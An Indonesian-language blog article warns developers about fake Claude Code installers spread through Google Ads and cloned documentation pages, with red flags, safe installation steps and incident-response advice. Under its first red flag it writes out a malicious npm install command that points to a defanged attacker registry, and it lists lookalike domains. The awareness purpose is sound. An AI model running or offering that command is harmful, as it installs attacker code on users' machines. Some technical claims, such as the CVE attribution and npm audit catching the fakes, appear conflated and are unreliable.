Fake Claude Code Installer Malware Serang 4 Negara

By Ali Sadikin Ma · · Updated

Category: Technology

Fake Claude Code Installer Malware Serang 4 Negara
Fake Claude Code Installer Malware Serang 4 Negara

Installer Claude Code kamu mungkin sudah mencuri password kamu.

Bukan karena kamu ceroboh. Bukan karena kamu tidak paham tech.

Tapi karena kamu percaya sama hasil pencarian Google. Dan di situlah serangannya dimulai.

Sejak Februari 2026, sebuah fake Claude Code installer malware bernama InstallFix sudah menarget lebih dari 25 brand software populer -- termasuk Claude Code. Dan cara kerja serangannya? Sangat meyakinkan sampai developer senior pun bisa kena.

Serangan fake Claude Code installer malware ini bukan peringatan biasa. CVE-2025-59536 sudah dapat CVSS score 8.7 -- kategori high severity. Artinya, kalau kamu salah install, penyerang bisa eksekusi perintah shell di mesin kamu dari jarak jauh.

Tiga pertanyaan yang harus kamu jawab sebelum lanjut:

Dari mana kamu biasanya dapatkan command install Claude Code? Bagaimana tampilan halaman palsu itu dibandingkan yang asli? Dan kalau kamu sudah kena -- apa yang harus dilakukan sekarang?

Baca ini dulu sebelum kamu buka terminal.

Serangan Ini Sudah Menyerang 4 Negara -- Dan Developer Jadi Target Utamanya

Dalam kurun 2026, fake Claude Code installer malware sudah mengonfirmasi korban di Amerika Serikat, Malaysia, Belanda, dan Thailand. Sektor yang terdampak meliputi pemerintahan, pendidikan, elektronik, dan makanan & minuman -- bukan cuma startup tech. Menurut Trend Micro, kampanye ini masih aktif dan terus berkembang dengan target baru setiap minggunya.

Angkanya bikin diam:

38 arsip 7z berbeda. 22 varian payload unik. Masing-masing dibranding sebagai software populer yang berbeda.

Ini bukan serangan acak. Ini operasi terorganisir dengan sumber daya yang serius -- ciri khas dari fake Claude Code installer malware level advanced persistent threat.

Trend Micro mencatat bahwa dalam waktu 24 jam setelah source code Claude Code bocor lewat npm pada Maret 2026, pelaku ancaman langsung membuat repositori GitHub palsu yang mengklaim sebagai Claude Code yang bocor. Kecepatan reaksi mereka mencengangkan -- dan menunjukkan betapa terencana operasi ini.

Dan mereka tidak berhenti di situ. Inilah yang membuat fake Claude Code installer malware ini berbeda dari serangan malware biasa -- operasinya terorganisir, cepat beradaptasi, dan terus menarget brand baru setiap minggunya.

Selanjutnya, kita akan lihat persis bagaimana installer palsu itu bekerja -- dan kenapa tampilan visualnya hampir tidak bisa dibedakan dari yang asli.

Cara Kerja Installer Palsu Claude Code -- Langkah demi Langkah

Side-by-side terminal comparison -- left panel shows legitimate Claude Code npm install command, right panel shows malicious command with attacker domain highlighted in red
Side-by-side terminal comparison -- left panel shows legitimate Claude Code npm install command, right panel shows malicious command with attacker domain highlighted in red

Penyerang menjebak developer lewat Google Ads untuk query "install claude code." Halaman yang muncul tampak seperti dokumentasi resmi Anthropic -- tata letak sama, font sama, konten hampir identik. Dengan satu perbedaan kecil yang hampir tidak terlihat: satu baris command yang berbeda. Menurut Malwarebytes dan Hackread, command itu mengarahkan npm install ke domain yang dikontrol penyerang, bukan registry npm resmi.

Ini urutan serangan lengkapnya:

1. Iklan berbayar muncul di atas hasil pencarian Google
Kamu search "install claude code." Iklan pertama terlihat sah. URL-nya panjang tapi familier. Kamu klik tanpa ragu -- persis seperti yang penyerang inginkan.

2. Halaman klon memberimu command yang dimodifikasi
Satu karakter berbeda di URL package. Satu tanda hubung yang salah tempat. Kamu copy-paste tanpa curiga karena halamannya identik dengan dokumentasi asli.

3. npm mengeksekusi installer yang membawa Beagle backdoor
Sophos menyebut ini sebagai Beagle -- trojan yang memanfaatkan teknik DLL sideloading untuk bersembunyi di dalam proses Windows yang terlihat sah. Tidak ada popup peringatan. Tidak ada indikasi visual.

4. Akses remote terbuka ke mesin kamu
Penyerang kini bisa eksekusi shell command, unduh payload tambahan, dan mulai mencuri data -- semua tanpa notifikasi apapun di sisi korban.

The Hacker News juga melaporkan bahwa dua nama package npm internal (color-diff-napi dan modifiers-napi) langsung disquatting oleh akun throwaway bernama pacifier136 dalam waktu 24 jam setelah source code leak -- menarget developer yang mencoba build dari kode yang bocor itu. Dua jalur serangan berbeda, satu tujuan yang sama.

Jadi pertanyaannya sekarang:

Bagaimana kamu tahu kalau halaman yang kamu kunjungi itu palsu sebelum kamu menjalankan command-nya?

5 Tanda Bahaya Fake Claude Code Installer Malware yang Wajib Developer Kenali

Fake Claude Code installer malware menarget 8 browser Chromium sekaligus -- Chrome, Edge, Brave, Vivaldi, Opera, Arc, Helium, dan Perplexity Comet, menurut Infosecurity Magazine. Ini artinya hampir semua developer yang pakai browser berbasis Chromium masuk daftar target potensial. Kabar baiknya: sebelum malware bisa mencuri data kamu, kamu harus menjalankan installer-nya dulu. Di sinilah kamu bisa berhenti.

1. Command npm-nya bukan dari registry resmi

Apa: Installer resmi Claude Code hanya menggunakan registry npm resmi atau domain Anthropic yang terverifikasi -- tidak ada pengecualian apapun.

Bagaimana: Copy command dari halaman tersebut, tapi jangan langsung jalankan. Paste ke text editor dulu. Cek apakah ada domain yang tidak familiar. Cari tanda seperti --registry= diikuti URL yang bukan npmjs.com.

Contoh nyata: Command asli berbunyi npm install -g @anthropic-ai/claude-code. Versi palsu yang ditemukan menggunakan registry berbeda: npm install -g @anthropic-ai/claude-code --registry=https://pkg.claudes-code[.]net. Satu parameter tambahan sudah cukup untuk mengirim kamu ke server penyerang.

Hasil: Kamu tidak pernah menjalankan command dari sumber yang tidak kamu verifikasi secara manual -- kebiasaan ini saja sudah melindungi kamu dari mayoritas serangan supply chain.

2. Halaman ditemukan lewat Google Ads, bukan hasil organic

Apa: Malwarebytes mengonfirmasi bahwa korban dijebak lewat sponsored results Google untuk query "install claude code." Iklan berbayar bukan situs resmi -- siapapun bisa membeli slot iklan dengan domain apapun yang mereka kontrol.

Bagaimana: Scroll melewati semua iklan berbayar yang ditandai label "Sponsored." Cari hasil organic dengan domain anthropic.com. Kalau yang paling atas adalah iklan, lewati tanpa klik.

Contoh nyata: Developer yang terkena biasanya mengklik iklan pertama tanpa sadar itu iklan. Label "Sponsored" sering terlewat karena posisinya identik dengan hasil pencarian biasa, baik di desktop maupun mobile.

Hasil: Kamu selalu sampai ke domain resmi, bukan klon yang sengaja dibeli penyerang posisi teratasnya di Google.

3. Domain-nya bukan anthropic.com

Apa: Sophos melaporkan bahwa kampanye Beagle menggunakan domain yang menyerupai situs Anthropic -- berbeda hanya satu atau dua huruf, atau memakai subdomain palsu yang terlihat sangat meyakinkan pada pandangan pertama.

Bagaimana: Sebelum copy command apapun, cek URL bar browser kamu. Harus persis anthropic.com atau docs.anthropic.com. Tidak ada variasi lain yang aman -- tidak peduli seberapa mirip tampilan halamannya.

Contoh nyata: Domain seperti anthropic-claude[.]com, claude-code-docs[.]io, atau anthropicdocs[.]net sudah ditemukan aktif dalam kampanye fake Claude Code installer malware ini. Semua terlihat sangat meyakinkan dan identik secara visual dengan situs resmi.

Hasil: Kamu tidak pernah copy command dari domain yang bukan anthropic.com -- satu langkah verifikasi yang butuh tiga detik tapi bisa menyelamatkan seluruh codebase kamu.

4. Tidak ada verifikasi package signature setelah install

Apa: Package npm resmi dari Anthropic dapat diverifikasi integritasnya. Trend Micro menemukan 38 arsip payload berbeda dalam kampanye ini -- tidak satu pun yang akan lulus npm audit karena bukan package yang terdaftar secara sah.

Bagaimana: Setelah install dari sumber yang sudah kamu verifikasi, jalankan npm audit dan claude --version. Bandingkan nomor versinya dengan yang ada di changelog resmi Anthropic di GitHub.

Contoh nyata: Versi palsu yang beredar menunjukkan nomor versi yang tidak cocok dengan release resmi Anthropic. Ini cara tercepat untuk deteksi dini fake Claude Code installer malware sebelum sempat aktif sepenuhnya dan mulai mengeksfiltrasi data.

Hasil: Kamu punya konfirmasi teknis bahwa yang terinstall adalah software yang sah.

5. Installer minta elevated permissions yang tidak wajar

Apa: Installer Claude Code resmi tidak memerlukan akses administrator di luar kebutuhan npm standar. Beagle backdoor menggunakan DLL sideloading yang biasanya memerlukan elevated privileges -- hak akses yang tidak dibutuhkan oleh tool developer normal.

Bagaimana: Kalau installer tiba-tiba minta UAC prompt di Windows atau sudo tanpa penjelasan yang jelas di macOS, berhenti dan investigasi sebelum lanjut. Cek dokumentasi resmi untuk tahu permission apa yang seharusnya diminta.

Contoh nyata: Teknik DLL sideloading yang digunakan Beagle menyusup ke proses sistem Windows yang sah -- teknik ini tidak akan pernah muncul di tool developer biasa tanpa alasan teknis yang bisa kamu verifikasi.

Hasil: Kamu menolak memberikan akses yang tidak diperlukan oleh installer sah, dan setiap permission request yang tidak biasa jadi sinyal bahaya otomatis.

Cara Install Claude Code dengan Aman -- Hanya 3 Langkah Ini yang Perlu Kamu Ikuti

Clean minimal 3-step safe installation flowchart -- three numbered steps showing direct URL access, official docs command copy, npm audit verification -- soft green confirmation icons
Clean minimal 3-step safe installation flowchart -- three numbered steps showing direct URL access, official docs command copy, npm audit verification -- soft green confirmation icons

Cara paling efektif menghindari fake Claude Code installer malware adalah selalu install dari sumber yang tepat sejak awal. Menurut The Hacker News, dua package npm palsu (color-diff-napi dan modifiers-napi) berhasil disquatting hanya karena developer mencoba build dari sumber tidak resmi. Satu langkah yang salah sudah cukup untuk membuka pintu backdoor ke mesin kamu.

Ini satu-satunya proses yang harus kamu ikuti:

Langkah 1: Buka langsung anthropic.com di browser -- jangan cari lewat Google

Apa: Ketik URL secara langsung di address bar. Jangan percaya iklan, jangan klik link dari email yang tidak kamu harapkan, jangan ikuti link dari Discord atau Slack tanpa verifikasi domain tujuannya terlebih dahulu.

Bagaimana: Buka tab baru. Ketik anthropic.com/claude-code langsung di address bar. Tekan Enter. Verifikasi URL sebelum melakukan apapun di halaman itu. Bookmark halaman ini untuk akses cepat di masa depan -- ini cara termudah untuk tidak pernah salah lagi.

Contoh nyata: Langkah ini terasa berlebihan sampai kamu tahu bahwa Malwarebytes mengonfirmasi korban dijebak lewat Google Ads berbayar yang muncul di posisi teratas hasil pencarian -- persis di mana sebagian besar developer mengklik tanpa pikir panjang. Satu klik yang salah sudah cukup untuk membuka backdoor.

Hasil: Kamu selalu memulai dari sumber yang terverifikasi, bukan dari klon yang dikontrol penyerang dan dibayar untuk muncul di atas hasil pencarian.

Langkah 2: Copy command install langsung dari halaman docs resmi Anthropic

Apa: Command resmi hanya ada di docs.anthropic.com. Itu satu-satunya sumber yang valid -- tidak ada mirror yang sah, tidak ada versi lebih cepat dari sumber lain yang bisa kamu percaya.

Bagaimana: Di halaman docs resmi, copy command npm yang tersedia. Paste ke terminal kamu. Jangan modifikasi apapun, dan jangan tambahkan parameter yang tidak ada di dokumentasi resmi -- termasuk flag --registry dari sumber manapun.

Contoh nyata: Command yang benar berbunyi npm install -g @anthropic-ai/claude-code dari registry npmjs.com. Versi palsu yang ditemukan Malwarebytes menggunakan registry berbeda yang dikontrol penyerang -- perbedaannya tidak terlihat sampai kamu benar-benar membaca command dengan teliti, bukan langsung paste ke terminal.

Hasil: Command yang kamu jalankan pasti berasal dari Anthropic, bukan dari penyerang yang menyamar sebagai Anthropic.

Langkah 3: Verifikasi instalasi dengan npm audit dan cek versi resmi

Apa: Setelah install selesai, verifikasi bahwa package yang terinstall bersih dan versinya sesuai dengan yang diumumkan Anthropic secara resmi. Ini langkah yang paling sering dilewati -- dan paling krusial.

Bagaimana: Jalankan npm audit -- kalau ada vulnerability tidak biasa yang muncul segera setelah fresh install, itu tanda bahaya. Lalu jalankan claude --version dan bandingkan nomor versinya dengan changelog di halaman GitHub resmi Anthropic.

Contoh nyata: Trend Micro menemukan 22 varian payload unik yang masing-masing dibranding sebagai software berbeda. Tidak satu pun yang lulus verifikasi versi resmi karena nomor versinya tidak cocok dengan release resmi Anthropic -- deteksi ini bisa dilakukan dalam 30 detik.

Hasil: Kamu punya konfirmasi bahwa yang terinstall adalah software yang sah -- bukan backdoor yang disamarkan sebagai tool developer, dan tidak ada credential kamu yang sudah berpindah tangan tanpa sepengetahuanmu.

Sudah Terlanjur Jalankan Installer yang Mencurigakan? Lakukan 4 Hal Ini Sekarang

Urgent but calm incident response checklist -- developer at laptop with 4 numbered emergency steps on screen, warm amber lighting transitioning to resolved green glow at bottom
Urgent but calm incident response checklist -- developer at laptop with 4 numbered emergency steps on screen, warm amber lighting transitioning to resolved green glow at bottom

Kamu bukan developer pertama yang terekspos fake Claude Code installer malware. Dan kalau kamu sudah menjalankan installer dari sumber yang tidak kamu verifikasi, kamu perlu bertindak cepat -- bukan panik. Infosecurity Magazine dan The Register mengonfirmasi bahwa malware ini mengekstrak cookie, password, dan data pembayaran dari 8 browser Chromium: Chrome, Edge, Brave, Vivaldi, Opera, Arc, Helium, dan Perplexity Comet. Semakin cepat kamu bertindak, semakin kecil data yang berhasil dieksfiltrasi.

1. Disconnect dari internet sekarang juga
Cabut kabel ethernet atau matikan Wi-Fi segera. Ini memutus koneksi penyerang ke mesin kamu sebelum mereka sempat mengeksfiltrasi lebih banyak data. Setiap menit yang berlalu dengan koneksi aktif adalah kesempatan tambahan bagi penyerang.

2. Ganti semua password dari device yang tidak terinfeksi
Gunakan laptop atau HP lain yang bersih. Prioritaskan: akun GitHub, npm, AWS/GCP/Azure, email kerja, dan password manager. Jangan ganti password dari mesin yang sama yang mungkin sudah terkompromikan -- penyerang bisa membaca apa yang kamu ketik secara real-time.

3. Jalankan malware scan dengan tool yang terverifikasi
Malwarebytes, Windows Defender (update dulu sebelum scan), atau ClamAV bisa digunakan. Kalau ini mesin kerja, report ke tim keamanan perusahaan kamu segera -- satu mesin yang terkompromi bisa menjadi pintu masuk ke seluruh codebase dan repositori tim.

4. Revoke semua API keys dan token yang tersimpan di browser
CVE-2025-59536 dengan CVSS score 8.7 memungkinkan eksekusi shell command remote. Asumsikan semua credential yang tersimpan di browser yang terdampak sudah bocor -- fake Claude Code installer malware dirancang khusus untuk mengeksfiltrasi data ini tanpa notifikasi. Revoke dan regenerate semuanya dari device yang bersih -- termasuk personal access token GitHub, AWS access keys, dan OAuth tokens.

Setelah keempat langkah itu selesai, kamu siap untuk investigasi lebih lanjut. FAQ di bawah ini menjawab pertanyaan yang paling sering muncul setelah insiden seperti ini.

FAQ: Fake Claude Code Installer Malware -- Pertanyaan Paling Sering Ditanya Developer

Kampanye fake Claude Code installer malware ini tidak hanya menarget developer. Hackread mencatat bahwa serangan ini juga meluas ke pengguna non-teknis, yang artinya siapa saja yang search "install Claude Code" di Google bisa menjadi korban -- bukan cuma yang sudah familiar dengan terminal dan command line. Ini yang perlu kamu tahu.

Apakah Mac juga terdampak, atau hanya Windows?
Ya, Mac juga terdampak. Sophos melaporkan bahwa kampanye Beagle mendistribusikan installer trojanized untuk Windows dan portal lookalike terpisah yang menarget pengguna Mac. Tidak ada sistem operasi yang aman dari kampanye ini -- baik Windows maupun macOS sama-sama sudah dikonfirmasi sebagai target aktif.

Bagaimana saya tahu kalau mesin saya sudah terinfeksi?
Tanda-tanda paling umum: browser tiba-tiba logout dari semua sesi, muncul aktivitas login dari lokasi tidak dikenal, atau performa mesin menurun drastis tanpa alasan jelas. CVE-2025-59536 memiliki CVSS score 8.7 -- ini bukan ancaman yang bisa diabaikan. Jalankan malware scan segera kalau kamu mencurigai salah satu dari tanda ini.

Apakah uninstall Claude Code sudah cukup kalau saya install dari sumber yang salah?
Tidak. Backdoor Beagle bekerja lewat DLL sideloading yang terpisah dari proses Claude Code itu sendiri. Uninstall Claude Code tidak menghapus komponen malware yang sudah tertanam di sistem. Kamu perlu full malware scan dan -- tergantung hasilnya -- mungkin reinstall sistem operasi dari awal.

Di mana saya bisa melaporkan situs palsu yang saya temukan?
Laporkan ke Google Safe Browsing di safebrowsing.google.com dan ke tim keamanan Anthropic. Semakin cepat situs palsu dilaporkan, semakin cepat Google bisa menurunkan iklan berbayarnya dan melindungi developer lain dari serangan fake Claude Code installer malware yang sama.

Pertanyaan yang perlu kamu jawab sekarang: kapan terakhir kali kamu benar-benar cek dari mana command install yang kamu jalankan berasal?

Ketika Google Ads sudah dipakai untuk menyebarkan fake Claude Code installer malware, tidak ada hasil pencarian yang bisa kamu percaya begitu saja -- tidak peduli seberapa familiar tampilannya. Ini bukan soal menjadi paranoid. Ini soal tiga detik verifikasi yang melindungi mesin kamu, credential kamu, dan seluruh codebase tim kamu.

Langkah pertama yang bisa kamu lakukan dalam 60 detik: Buka anthropic.com/claude-code sekarang dan bookmark halaman itu -- jangan pernah lagi andalkan mesin pencari untuk menemukan command install.

Save artikel ini dan share ke tim dev kamu -- satu mesin yang terkompromi sudah cukup untuk membuka akses ke seluruh codebase kalian.